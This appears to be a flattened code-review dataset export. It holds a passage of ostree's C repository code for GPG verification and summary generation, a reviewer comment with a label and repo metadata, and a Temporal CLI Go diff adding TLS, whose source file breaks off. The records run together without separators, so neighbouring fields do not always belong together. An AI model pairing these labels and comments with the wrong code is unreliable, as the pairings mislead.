OSTREE_GPG_ERROR_NO_SIGNATURE, "GPG verification enabled, but no signatures found (use gpg-verify=false in remote config to disable)"); return NULL; } /* OpenPGP data is organized into binary records called packets. RFC 4880 * defines a packet as a chunk of data that has a tag specifying its meaning, * and consists of a packet header followed by a packet body. Each packet * encodes its own length, and so packets can be concatenated to construct * OpenPGP messages, keyrings, or in this case, detached signatures. * * Each binary blob in the GVariant list is a complete signature packet, so * we can concatenate them together to verify all the signatures at once. */ buffer = g_byte_array_new (); g_variant_iter_init (&iter, signaturedata); while ((child = g_variant_iter_next_value (&iter)) != NULL) { g_byte_array_append (buffer, g_variant_get_data (child), g_variant_get_size (child)); g_variant_unref (child); } signatures = g_byte_array_free_to_bytes (buffer); return _ostree_repo_gpg_verify_data_internal (self, remote_name, signed_data, signatures, keyringdir, extra_keyring, cancellable, error); } /* Needed an internal version for the remote_name parameter. */ OstreeGpgVerifyResult * _ostree_repo_verify_commit_internal (OstreeRepo *self, const char *commit_checksum, const char *remote_name, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) commit_variant = NULL; /* Load the commit */ if (!ostree_repo_load_variant (self, OSTREE_OBJECT_TYPE_COMMIT, commit_checksum, &commit_variant, error)) return glnx_prefix_error_null (error, "Failed to read commit"); /* Load the metadata */ g_autoptr(GVariant) metadata = NULL; if (!ostree_repo_read_commit_detached_metadata (self, commit_checksum, &metadata, cancellable, error)) return glnx_prefix_error_null (error, "Failed to read detached metadata"); g_autoptr(GBytes) signed_data = g_variant_get_data_as_bytes (commit_variant); /* XXX This is a hackish way to indicate to use ALL remote-specific * keyrings in the signature verification. We want this when * verifying a signed commit that's already been pulled. */ if (remote_name == NULL) remote_name = OSTREE_ALL_REMOTES; return _ostree_repo_gpg_verify_with_metadata (self, signed_data, metadata, remote_name, keyringdir, extra_keyring, cancellable, error); } #endif /* OSTREE_DISABLE_GPGME */ /** * ostree_repo_verify_commit: * @self: Repository * @commit_checksum: ASCII SHA256 checksum * @keyringdir: (allow-none): Path to directory GPG keyrings; overrides built-in default if given * @extra_keyring: (allow-none): Path to additional keyring file (not a directory) * @cancellable: Cancellable * @error: Error * * Check for a valid GPG signature on commit named by the ASCII * checksum @commit_checksum. * * Returns: %TRUE if there was a GPG signature from a trusted keyring, otherwise %FALSE */ gboolean ostree_repo_verify_commit (OstreeRepo *self, const gchar *commit_checksum, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME g_autoptr(OstreeGpgVerifyResult) result = NULL; result = ostree_repo_verify_commit_ext (self, commit_checksum, keyringdir, extra_keyring, cancellable, error); if (!ostree_gpg_verify_result_require_valid_signature (result, error)) return glnx_prefix_error (error, "Commit %s", commit_checksum); return TRUE; #else /* FIXME: Return false until refactoring */ return glnx_throw (error, "GPG feature is disabled in a build time"); #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_verify_commit_ext: * @self: Repository * @commit_checksum: ASCII SHA256 checksum * @keyringdir: (allow-none): Path to directory GPG keyrings; overrides built-in default if given * @extra_keyring: (allow-none): Path to additional keyring file (not a directory) * @cancellable: Cancellable * @error: Error * * Read GPG signature(s) on the commit named by the ASCII checksum * @commit_checksum and return detailed results. * * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error */ OstreeGpgVerifyResult * ostree_repo_verify_commit_ext (OstreeRepo *self, const gchar *commit_checksum, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_verify_commit_internal (self, commit_checksum, NULL, keyringdir, extra_keyring, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_verify_commit_for_remote: * @self: Repository * @commit_checksum: ASCII SHA256 checksum * @remote_name: OSTree remote to use for configuration * @cancellable: Cancellable * @error: Error * * Read GPG signature(s) on the commit named by the ASCII checksum * @commit_checksum and return detailed results, based on the keyring * configured for @remote. * * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error * * Since: 2016.14 */ OstreeGpgVerifyResult * ostree_repo_verify_commit_for_remote (OstreeRepo *self, const gchar *commit_checksum, const gchar *remote_name, GCancellable *cancellable, GError **error) { #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_verify_commit_internal (self, commit_checksum, remote_name, NULL, NULL, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_gpg_verify_data: * @self: Repository * @remote_name: (nullable): Name of remote * @data: Data as a #GBytes * @signatures: Signatures as a #GBytes * @keyringdir: (nullable): Path to directory GPG keyrings; overrides built-in default if given * @extra_keyring: (nullable): Path to additional keyring file (not a directory) * @cancellable: Cancellable * @error: Error * * Verify @signatures for @data using GPG keys in the keyring for * @remote_name, and return an #OstreeGpgVerifyResult. * * The @remote_name parameter can be %NULL. In that case it will do * the verifications using GPG keys in the keyrings of all remotes. * * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error * * Since: 2016.6 */ OstreeGpgVerifyResult * ostree_repo_gpg_verify_data (OstreeRepo *self, const gchar *remote_name, GBytes *data, GBytes *signatures, GFile *keyringdir, GFile *extra_keyring, GCancellable *cancellable, GError **error) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); g_return_val_if_fail (data != NULL, NULL); g_return_val_if_fail (signatures != NULL, NULL); #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_gpg_verify_data_internal (self, (remote_name != NULL) ? remote_name : OSTREE_ALL_REMOTES, data, signatures, keyringdir, extra_keyring, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /** * ostree_repo_verify_summary: * @self: Repo * @remote_name: Name of remote * @summary: Summary data as a #GBytes * @signatures: Summary signatures as a #GBytes * @cancellable: Cancellable * @error: Error * * Verify @signatures for @summary data using GPG keys in the keyring for * @remote_name, and return an #OstreeGpgVerifyResult. * * Returns: (transfer full): an #OstreeGpgVerifyResult, or %NULL on error */ OstreeGpgVerifyResult * ostree_repo_verify_summary (OstreeRepo *self, const char *remote_name, GBytes *summary, GBytes *signatures, GCancellable *cancellable, GError **error) { g_autoptr(GVariant) signatures_variant = NULL; g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); g_return_val_if_fail (remote_name != NULL, NULL); g_return_val_if_fail (summary != NULL, NULL); g_return_val_if_fail (signatures != NULL, NULL); signatures_variant = g_variant_new_from_bytes (OSTREE_SUMMARY_SIG_GVARIANT_FORMAT, signatures, FALSE); #ifndef OSTREE_DISABLE_GPGME return _ostree_repo_gpg_verify_with_metadata (self, summary, signatures_variant, remote_name, NULL, NULL, cancellable, error); #else glnx_throw (error, "GPG feature is disabled in a build time"); return NULL; #endif /* OSTREE_DISABLE_GPGME */ } /* Add an entry for a @ref ↦ @checksum mapping to an `a(s(t@ay@a{sv}))` * @refs_builder to go into a `summary` file. This includes building the * standard additional metadata keys for the ref. */ static gboolean summary_add_ref_entry (OstreeRepo *self, const char *ref, const char *checksum, GVariantBuilder *refs_builder, GError **error) { g_auto(GVariantDict) commit_metadata_builder = OT_VARIANT_BUILDER_INITIALIZER; g_assert (ref); g_assert (checksum); g_autofree char *remotename = NULL; if (!ostree_parse_refspec (ref, &remotename, NULL, NULL)) g_assert_not_reached (); /* Don't put remote refs in the summary */ if (remotename != NULL) return TRUE; g_autoptr(GVariant) commit_obj = NULL; if (!ostree_repo_load_variant (self, OSTREE_OBJECT_TYPE_COMMIT, checksum, &commit_obj, error)) return FALSE; g_variant_dict_init (&commit_metadata_builder, NULL); /* Forward the commit’s timestamp if it’s valid. */ guint64 commit_timestamp = ostree_commit_get_timestamp (commit_obj); g_autoptr(GDateTime) dt = g_date_time_new_from_unix_utc (commit_timestamp); if (dt != NULL) g_variant_dict_insert_value (&commit_metadata_builder, OSTREE_COMMIT_TIMESTAMP, g_variant_new_uint64 (GUINT64_TO_BE (commit_timestamp))); g_variant_builder_add_value (refs_builder, g_variant_new ("(s(t@ay@a{sv}))", ref, (guint64) g_variant_get_size (commit_obj), ostree_checksum_to_bytes_v (checksum), g_variant_dict_end (&commit_metadata_builder))); return TRUE; } /** * ostree_repo_regenerate_summary: * @self: Repo * @additional_metadata: (allow-none): A GVariant of type a{sv}, or %NULL * @cancellable: Cancellable * @error: Error * * An OSTree repository can contain a high level "summary" file that * describes the available branches and other metadata. * * If the timetable for making commits and updating the summary file is fairly * regular, setting the `ostree.summary.expires` key in @additional_metadata * will aid clients in working out when to check for updates. * * It is regenerated automatically after any ref is * added, removed, or updated if `core/auto-update-summary` is set. * * If the `core/collection-id` key is set in the configuration, it will be * included as %OSTREE_SUMMARY_COLLECTION_ID in the summary file. Refs that * have associated collection IDs will be included in the generated summary * file, listed under the %OSTREE_SUMMARY_COLLECTION_MAP key. Collection IDs * and refs in %OSTREE_SUMMARY_COLLECTION_MAP are guaranteed to be in * lexicographic order. * * Locking: exclusive */ gboolean ostree_repo_regenerate_summary (OstreeRepo *self, GVariant *additional_metadata, GCancellable *cancellable, GError **error) { /* Take an exclusive lock. This makes sure the commits and deltas don't get * deleted while generating the summary. It also means we can be sure refs * won't be created/updated/deleted during the operation, without having to * add exclusive locks to those operations which would prevent concurrent * commits from working. */ g_autoptr(OstreeRepoAutoLock) lock = NULL; gboolean no_deltas_in_summary = FALSE; lock = _ostree_repo_auto_lock_push (self, OSTREE_REPO_LOCK_EXCLUSIVE, cancellable, error); if (!lock) return FALSE; g_auto(GVariantDict) additional_metadata_builder = OT_VARIANT_BUILDER_INITIALIZER; g_variant_dict_init (&additional_metadata_builder, additional_metadata); g_autoptr(GVariantBuilder) refs_builder = g_variant_builder_new (G_VARIANT_TYPE ("a(s(taya{sv}))")); const gchar *main_collection_id = ostree_repo_get_collection_id (self); { if (main_collection_id == NULL) { g_autoptr(GHashTable) refs = NULL; if (!ostree_repo_list_refs (self, NULL, &refs, cancellable, error)) return FALSE; g_autoptr(GList) ordered_keys = g_hash_table_get_keys (refs); ordered_keys = g_list_sort (ordered_keys, (GCompareFunc)strcmp); for (GList *iter = ordered_keys; iter; iter = iter->next) { const char *ref = iter->data; const char *commit = g_hash_table_lookup (refs, ref); if (!summary_add_ref_entry (self, ref, commit, refs_builder, error)) return FALSE; } } } if (!ot_keyfile_get_boolean_with_default (self->config, "core", "no-deltas-in-summary", FALSE, &no_deltas_in_summary, error)) return FALSE; if (!no_deltas_in_summary) { g_autoptr(GPtrArray) delta_names = NULL; g_auto(GVariantDict) deltas_builder = OT_VARIANT_BUILDER_INITIALIZER; if (!ostree_repo_list_static_delta_names (self, &delta_names, cancellable, error)) return FALSE; g_variant_dict_init (&deltas_builder, NULL); for (guint i = 0; i < delta_names->len; i++) { g_autofree char *from = NULL; g_autofree char *to = NULL; GVariant *digest; if (!_ostree_parse_delta_name (delta_names->pdata[i], &from, &to, error)) return FALSE; digest = _ostree_repo_static_delta_superblock_digest (self, (from && from[0]) ? from : NULL, to, cancellable, error); if (digest == NULL) return FALSE; g_variant_dict_insert_value (&deltas_builder, delta_names->pdata[i], digest); } if (delta_names->len > 0) g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_STATIC_DELTAS, g_variant_dict_end (&deltas_builder)); } { g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_LAST_MODIFIED, g_variant_new_uint64 (GUINT64_TO_BE (g_get_real_time () / G_USEC_PER_SEC))); } { g_autofree char *remote_mode_str = NULL; if (!ot_keyfile_get_value_with_default (self->config, "core", "mode", "bare", &remote_mode_str, error)) return FALSE; g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_MODE, g_variant_new_string (remote_mode_str)); } { gboolean tombstone_commits = FALSE; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "tombstone-commits", FALSE, &tombstone_commits, error)) return FALSE; g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_TOMBSTONE_COMMITS, g_variant_new_boolean (tombstone_commits)); } g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_INDEXED_DELTAS, g_variant_new_boolean (TRUE)); /* Add refs which have a collection specified, which could be in refs/mirrors, * refs/heads, and/or refs/remotes. */ { g_autoptr(GHashTable) collection_refs = NULL; if (!ostree_repo_list_collection_refs (self, NULL, &collection_refs, OSTREE_REPO_LIST_REFS_EXT_NONE, cancellable, error)) return FALSE; gsize collection_map_size = 0; GHashTableIter iter; g_autoptr(GHashTable) collection_map = NULL; /* (element-type utf8 GHashTable) */ g_hash_table_iter_init (&iter, collection_refs); collection_map = g_hash_table_new_full (g_str_hash, g_str_equal, NULL, (GDestroyNotify) g_hash_table_unref); const OstreeCollectionRef *c_ref; const char *checksum; while (g_hash_table_iter_next (&iter, (gpointer *) &c_ref, (gpointer *) &checksum)) { GHashTable *ref_map = g_hash_table_lookup (collection_map, c_ref->collection_id); if (ref_map == NULL) { ref_map = g_hash_table_new_full (g_str_hash, g_str_equal, NULL, NULL); g_hash_table_insert (collection_map, c_ref->collection_id, ref_map); } g_hash_table_insert (ref_map, c_ref->ref_name, (gpointer) checksum); } g_autoptr(GVariantBuilder) collection_refs_builder = g_variant_builder_new (G_VARIANT_TYPE ("a{sa(s(taya{sv}))}")); g_autoptr(GList) ordered_collection_ids = g_hash_table_get_keys (collection_map); ordered_collection_ids = g_list_sort (ordered_collection_ids, (GCompareFunc) strcmp); for (GList *collection_iter = ordered_collection_ids; collection_iter; collection_iter = collection_iter->next) { const char *collection_id = collection_iter->data; GHashTable *ref_map = g_hash_table_lookup (collection_map, collection_id); /* We put the local repo's collection ID in the main refs map, rather * than the collection map, for backwards compatibility. */ gboolean is_main_collection_id = (main_collection_id != NULL && g_str_equal (collection_id, main_collection_id)); if (!is_main_collection_id) { g_variant_builder_open (collection_refs_builder, G_VARIANT_TYPE ("{sa(s(taya{sv}))}")); g_variant_builder_add (collection_refs_builder, "s", collection_id); g_variant_builder_open (collection_refs_builder, G_VARIANT_TYPE ("a(s(taya{sv}))")); } g_autoptr(GList) ordered_refs = g_hash_table_get_keys (ref_map); ordered_refs = g_list_sort (ordered_refs, (GCompareFunc) strcmp); for (GList *ref_iter = ordered_refs; ref_iter != NULL; ref_iter = ref_iter->next) { const char *ref = ref_iter->data; const char *commit = g_hash_table_lookup (ref_map, ref); GVariantBuilder *builder = is_main_collection_id ? refs_builder : collection_refs_builder; if (!summary_add_ref_entry (self, ref, commit, builder, error)) return FALSE; if (!is_main_collection_id) collection_map_size++; } if (!is_main_collection_id) { g_variant_builder_close (collection_refs_builder); /* array */ g_variant_builder_close (collection_refs_builder); /* dict entry */ } } if (main_collection_id != NULL) g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_COLLECTION_ID, g_variant_new_string (main_collection_id)); if (collection_map_size > 0) g_variant_dict_insert_value (&additional_metadata_builder, OSTREE_SUMMARY_COLLECTION_MAP, g_variant_builder_end (collection_refs_builder)); } g_autoptr(GVariant) summary = NULL; { g_autoptr(GVariantBuilder) summary_builder = g_variant_builder_new (OSTREE_SUMMARY_GVARIANT_FORMAT); g_variant_builder_add_value (summary_builder, g_variant_builder_end (refs_builder)); g_variant_builder_add_value (summary_builder, g_variant_dict_end (&additional_metadata_builder)); summary = g_variant_builder_end (summary_builder); g_variant_ref_sink (summary); } if (!ostree_repo_static_delta_reindex (self, 0, NULL, cancellable, error)) return FALSE; if (!_ostree_repo_file_replace_contents (self, self->repo_dir_fd, "summary", g_variant_get_data (summary), g_variant_get_size (summary), cancellable, error)) return FALSE; if (!ot_ensure_unlinked_at (self->repo_dir_fd, "summary.sig", error)) return FALSE; return TRUE; } /* Regenerate the summary if `core/auto-update-summary` is set. We default to FALSE for * this setting because OSTree supports multiple processes committing to the same repo (but * different refs) concurrently, and in fact gnome-continuous actually does this. In that * context it's best to update the summary explicitly once at the end of multiple * transactions instead of automatically here. `auto-update-summary` only updates * atomically within a transaction. */ gboolean _ostree_repo_maybe_regenerate_summary (OstreeRepo *self, GCancellable *cancellable, GError **error) { gboolean auto_update_summary; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "auto-update-summary", FALSE, &auto_update_summary, error)) return FALSE; /* Deprecated alias for `auto-update-summary`. */ gboolean commit_update_summary; if (!ot_keyfile_get_boolean_with_default (self->config, "core", "commit-update-summary", FALSE, &commit_update_summary, error)) return FALSE; if ((auto_update_summary || commit_update_summary) && !ostree_repo_regenerate_summary (self, NULL, cancellable, error)) return FALSE; return TRUE; } gboolean _ostree_repo_has_staging_prefix (const char *filename) { return g_str_has_prefix (filename, OSTREE_REPO_TMPDIR_STAGING); } gboolean _ostree_repo_try_lock_tmpdir (int tmpdir_dfd, const char *tmpdir_name, GLnxLockFile *file_lock_out, gboolean *out_did_lock, GError **error) { g_autofree char *lock_name = g_strconcat (tmpdir_name, "-lock", NULL); gboolean did_lock = FALSE; g_autoptr(GError) local_error = NULL; /* We put the lock outside the dir, so we can hold the lock * until the directory is fully removed */ if (!glnx_make_lock_file (tmpdir_dfd, lock_name, LOCK_EX | LOCK_NB, file_lock_out, &local_error)) { /* we need to handle EACCES too in the case of POSIX locks; see F_SETLK in fcntl(2) */ if (g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_WOULD_BLOCK) || g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_PERMISSION_DENIED)) { did_lock = FALSE; } else { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } else { /* It's possible that we got a lock after seeing the directory, but * another process deleted the tmpdir, so verify it still exists. */ struct stat stbuf; if (!glnx_fstatat_allow_noent (tmpdir_dfd, tmpdir_name, &stbuf, AT_SYMLINK_NOFOLLOW, error)) return FALSE; if (errno == 0 && S_ISDIR (stbuf.st_mode)) did_lock = TRUE; else glnx_release_lock_file (file_lock_out); } *out_did_lock = did_lock; return TRUE; } /* This allocates and locks a subdir of the repo tmp dir, using an existing * one with the same prefix if it is not in use already. */ gboolean _ostree_repo_allocate_tmpdir (int tmpdir_dfd, const char *tmpdir_prefix, GLnxTmpDir *tmpdir_out, GLnxLockFile *file_lock_out, gboolean *reusing_dir_out, GCancellable *cancellable, GError **error) { g_return_val_if_fail (_ostree_repo_has_staging_prefix (tmpdir_prefix), FALSE); /* Look for existing tmpdir (with same prefix) to reuse */ g_auto(GLnxDirFdIterator) dfd_iter = { 0, }; if (!glnx_dirfd_iterator_init_at (tmpdir_dfd, ".", FALSE, &dfd_iter, error)) return FALSE; gboolean reusing_dir = FALSE; gboolean did_lock = FALSE; g_auto(GLnxTmpDir) ret_tmpdir = { 0, }; while (!ret_tmpdir.initialized) { struct dirent *dent; g_autoptr(GError) local_error = NULL; if (!glnx_dirfd_iterator_next_dent (&dfd_iter, &dent, cancellable, error)) return FALSE; if (dent == NULL) break; if (!g_str_has_prefix (dent->d_name, tmpdir_prefix)) continue; /* Quickly skip non-dirs, if unknown we ignore ENOTDIR when opening instead */ if (dent->d_type != DT_UNKNOWN && dent->d_type != DT_DIR) continue; glnx_autofd int target_dfd = -1; if (!glnx_opendirat (dfd_iter.fd, dent->d_name, FALSE, &target_dfd, &local_error)) { if (g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_DIRECTORY) || g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) continue; else { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } /* We put the lock outside the dir, so we can hold the lock * until the directory is fully removed */ if (!_ostree_repo_try_lock_tmpdir (tmpdir_dfd, dent->d_name, file_lock_out, &did_lock, error)) return FALSE; if (!did_lock) continue; /* Touch the reused directory so that we don't accidentally * remove it due to being old when cleaning up the tmpdir. */ (void)futimens (target_dfd, NULL); /* We found an existing tmpdir which we managed to lock */ g_debug ("Reusing tmpdir %s", dent->d_name); reusing_dir = TRUE; ret_tmpdir.src_dfd = tmpdir_dfd; ret_tmpdir.fd = glnx_steal_fd (&target_dfd); ret_tmpdir.path = g_strdup (dent->d_name); ret_tmpdir.initialized = TRUE; } const char *tmpdir_name_template = glnx_strjoina (tmpdir_prefix, "XXXXXX"); while (!ret_tmpdir.initialized) { g_auto(GLnxTmpDir) new_tmpdir = { 0, }; /* No existing tmpdir found, create a new */ if (!glnx_mkdtempat (tmpdir_dfd, tmpdir_name_template, DEFAULT_DIRECTORY_MODE, &new_tmpdir, error)) return FALSE; /* Note, at this point we can race with another process that picks up this * new directory. If that happens we need to retry, making a new directory. */ if (!_ostree_repo_try_lock_tmpdir (new_tmpdir.src_dfd, new_tmpdir.path, file_lock_out, &did_lock, error)) return FALSE; if (!did_lock) { /* We raced and someone else already locked the newly created * directory. Free the resources here and then mark it as * uninitialized so glnx_tmpdir_cleanup doesn't delete the directory * when new_tmpdir goes out of scope. */ glnx_tmpdir_unset (&new_tmpdir); new_tmpdir.initialized = FALSE; continue; } g_debug ("Using new tmpdir %s", new_tmpdir.path); ret_tmpdir = new_tmpdir; /* Transfer ownership */ new_tmpdir.initialized = FALSE; } *tmpdir_out = ret_tmpdir; /* Transfer ownership */ ret_tmpdir.initialized = FALSE; *reusing_dir_out = reusing_dir; return TRUE; } /* See ostree-repo-private.h for more information about this */ void _ostree_repo_memory_cache_ref_init (OstreeRepoMemoryCacheRef *state, OstreeRepo *repo) { state->repo = g_object_ref (repo); GMutex *lock = &repo->cache_lock; g_mutex_lock (lock); repo->dirmeta_cache_refcount++; if (repo->dirmeta_cache == NULL) repo->dirmeta_cache = g_hash_table_new_full (g_str_hash, g_str_equal, g_free, (GDestroyNotify)g_variant_unref); g_mutex_unlock (lock); } /* See ostree-repo-private.h for more information about this */ void _ostree_repo_memory_cache_ref_destroy (OstreeRepoMemoryCacheRef *state) { OstreeRepo *repo = state->repo; GMutex *lock = &repo->cache_lock; g_mutex_lock (lock); repo->dirmeta_cache_refcount--; if (repo->dirmeta_cache_refcount == 0) g_clear_pointer (&repo->dirmeta_cache, (GDestroyNotify) g_hash_table_unref); g_mutex_unlock (lock); g_object_unref (repo); } /** * ostree_repo_get_collection_id: * @self: an #OstreeRepo * * Get the collection ID of this repository. See [collection IDs][collection-ids]. * * Returns: (nullable): collection ID for the repository * Since: 2018.6 */ const gchar * ostree_repo_get_collection_id (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); return self->collection_id; } /** * ostree_repo_set_collection_id: * @self: an #OstreeRepo * @collection_id: (nullable): new collection ID, or %NULL to unset it * @error: return location for a #GError, or %NULL * * Set or clear the collection ID of this repository. See [collection IDs][collection-ids]. * The update will be made in memory, but must be written out to the repository * configuration on disk using ostree_repo_write_config(). * * Returns: %TRUE on success, %FALSE otherwise * Since: 2018.6 */ gboolean ostree_repo_set_collection_id (OstreeRepo *self, const gchar *collection_id, GError **error) { if (collection_id != NULL && !ostree_validate_collection_id (collection_id, error)) return FALSE; g_autofree gchar *new_collection_id = g_strdup (collection_id); g_free (self->collection_id); self->collection_id = g_steal_pointer (&new_collection_id); if (self->config != NULL) { if (collection_id != NULL) g_key_file_set_string (self->config, "core", "collection-id", collection_id); else return g_key_file_remove_key (self->config, "core", "collection-id", error); } return TRUE; } /** * ostree_repo_get_default_repo_finders: * @self: an #OstreeRepo * * Get the set of default repo finders configured. See the documentation for * the "core.default-repo-finders" config key. * * Returns: (array zero-terminated=1) (element-type utf8): * %NULL-terminated array of strings. * Since: 2018.9 */ const gchar * const * ostree_repo_get_default_repo_finders (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); return (const gchar * const *)self->repo_finders; } /** * ostree_repo_get_bootloader: * @self: an #OstreeRepo * * Get the bootloader configured. See the documentation for the * "sysroot.bootloader" config key. * * Returns: (transfer none): bootloader configuration for the sysroot * Since: 2019.2 */ const gchar * ostree_repo_get_bootloader (OstreeRepo *self) { g_return_val_if_fail (OSTREE_IS_REPO (self), NULL); return CFG_SYSROOT_BOOTLOADER_OPTS_STR[self->bootloader]; } /** * _ostree_repo_verify_bindings: * @collection_id: (nullable): Locally specified collection ID for the remote * the @commit was retrieved from, or %NULL if none is configured * @ref_name: (nullable): Ref name the commit was retrieved using, or %NULL if * the commit was retrieved by checksum * @commit: Commit data to check * @error: Return location for a #GError, or %NULL * * Verify the ref and collection bindings. * * The ref binding is verified only if it exists. But if we have the * collection ID specified in the remote configuration (@collection_id is * non-%NULL) then the ref binding must exist, otherwise the verification will * fail. Parts of the verification can be skipped by passing %NULL to the * @ref_name parameter (in case we requested a checksum directly, without * looking it up from a ref). * * The collection binding is verified only when we have collection ID * specified in the remote configuration. If it is specified, then the * binding must exist and must be equal to the remote repository * collection ID. * * Returns: %TRUE if bindings are correct, %FALSE otherwise * Since: 2017.14 */ gboolean _ostree_repo_verify_bindings (const char *collection_id, const char *ref_name, GVariant *commit, GError **error) { g_autoptr(GVariant) metadata = g_variant_get_child_value (commit, 0); g_autofree const char **refs = NULL; if (!g_variant_lookup (metadata, OSTREE_COMMIT_META_KEY_REF_BINDING, "^a&s", &refs)) { /* Early return here - if the remote collection ID is NULL, then * we certainly will not verify the collection binding in the * commit. */ if (collection_id == NULL) return TRUE; return glnx_throw (error, "Expected commit metadata to have ref " "binding information, found none"); } if (ref_name != NULL) { if (!g_strv_contains ((const char *const *) refs, ref_name)) { g_autoptr(GString) refs_dump = g_string_new (NULL); const char *refs_str; if (refs != NULL && (*refs) != NULL) { for (const char **iter = refs; *iter != NULL; ++iter) { const char *ref = *iter; if (refs_dump->len > 0) g_string_append (refs_dump, ", "); g_string_append_printf (refs_dump, "‘%s’", ref); } refs_str = refs_dump->str; } else { refs_str = "no refs"; } return glnx_throw (error, "Commit has no requested ref ‘%s’ " "in ref binding metadata (%s)", ref_name, refs_str); } } if (collection_id != NULL) { const char *collection_id_binding; if (!g_variant_lookup (metadata, OSTREE_COMMIT_META_KEY_COLLECTION_BINDING, "&s", &collection_id_binding)) return glnx_throw (error, "Expected commit metadata to have collection ID " "binding information, found none"); if (!g_str_equal (collection_id_binding, collection_id)) return glnx_throw (error, "Commit has collection ID ‘%s’ in collection binding " "metadata, while the remote it came from has " "collection ID ‘%s’", collection_id_binding, collection_id); } return TRUE; }
1
19,210
Hmm, AFAICT `*out_variant` isn't explicitly set to `NULL` in the `ENOENT` case.
ostreedev-ostree
c
@@ -87,12 +87,18 @@ func (b *clientFactory) SDKClient(c *cli.Context, namespace string) sdkclient.Cl hostPort = localHostPort } + tlsConfig, err := b.createTLSConfig(c) + if err != nil { + b.logger.Fatal("Failed to create SDK client", zap.Error(err)) + } + sdkClient, err := sdkclient.NewClient(sdkclient.Options{ HostPort: hostPort, Namespace: namespace, Logger: log.NewZapAdapter(b.logger), ConnectionOptions: sdkclient.ConnectionOptions{ DisableHealthCheck: true, + TLS: tlsConfig, }, }) if err != nil {
1
// The MIT License // // Copyright (c) 2020 Temporal Technologies Inc. All rights reserved. // // Copyright (c) 2020 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package cli import ( "crypto/tls" "crypto/x509" "errors" "io/ioutil" "net" "github.com/urfave/cli" "go.temporal.io/api/workflowservice/v1" sdkclient "go.temporal.io/sdk/client" "go.uber.org/zap" "google.golang.org/grpc" "google.golang.org/grpc/credentials" "go.temporal.io/server/api/adminservice/v1" "go.temporal.io/server/common/auth" "go.temporal.io/server/common/log" ) // ClientFactory is used to construct rpc clients type ClientFactory interface { FrontendClient(c *cli.Context) workflowservice.WorkflowServiceClient AdminClient(c *cli.Context) adminservice.AdminServiceClient SDKClient(c *cli.Context, namespace string) sdkclient.Client } type clientFactory struct { logger *zap.Logger } // NewClientFactory creates a new ClientFactory func NewClientFactory() ClientFactory { logger, err := zap.NewDevelopment() if err != nil { panic(err) } return &clientFactory{ logger: logger, } } // FrontendClient builds a frontend client func (b *clientFactory) FrontendClient(c *cli.Context) workflowservice.WorkflowServiceClient { connection, _ := b.createGRPCConnection(c) return workflowservice.NewWorkflowServiceClient(connection) } // AdminClient builds an admin client (based on server side thrift interface) func (b *clientFactory) AdminClient(c *cli.Context) adminservice.AdminServiceClient { connection, _ := b.createGRPCConnection(c) return adminservice.NewAdminServiceClient(connection) } // AdminClient builds an admin client (based on server side thrift interface) func (b *clientFactory) SDKClient(c *cli.Context, namespace string) sdkclient.Client { hostPort := c.GlobalString(FlagAddress) if hostPort == "" { hostPort = localHostPort } sdkClient, err := sdkclient.NewClient(sdkclient.Options{ HostPort: hostPort, Namespace: namespace, Logger: log.NewZapAdapter(b.logger), ConnectionOptions: sdkclient.ConnectionOptions{ DisableHealthCheck: true, }, }) if err != nil { b.logger.Fatal("Failed to create SDK client", zap.Error(err)) } return sdkClient } func (b *clientFactory) createGRPCConnection(c *cli.Context) (*grpc.ClientConn, error) 